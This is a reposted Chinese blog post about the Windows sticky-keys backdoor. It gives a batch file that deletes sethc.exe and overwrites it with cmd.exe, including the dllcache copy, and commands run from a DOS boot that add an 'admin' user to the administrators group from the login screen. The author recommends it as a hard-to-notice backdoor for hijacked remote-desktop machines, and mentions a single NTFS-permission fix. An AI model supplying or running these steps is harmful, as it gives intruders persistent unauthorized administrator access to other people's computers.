粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦

@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。

个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢

然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]

[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]

用shift键破解windows的登录密码.

首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:

copy sethc.exe sethc2.exe 备份粘滞键文件

copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe

然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:

net user admin admin /add 添加admin用户,密码是admin

net localgroup administrators admin /add 提升为超级管理员

转载于:https://www.cnblogs.com/cqsar/articles/1225764.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值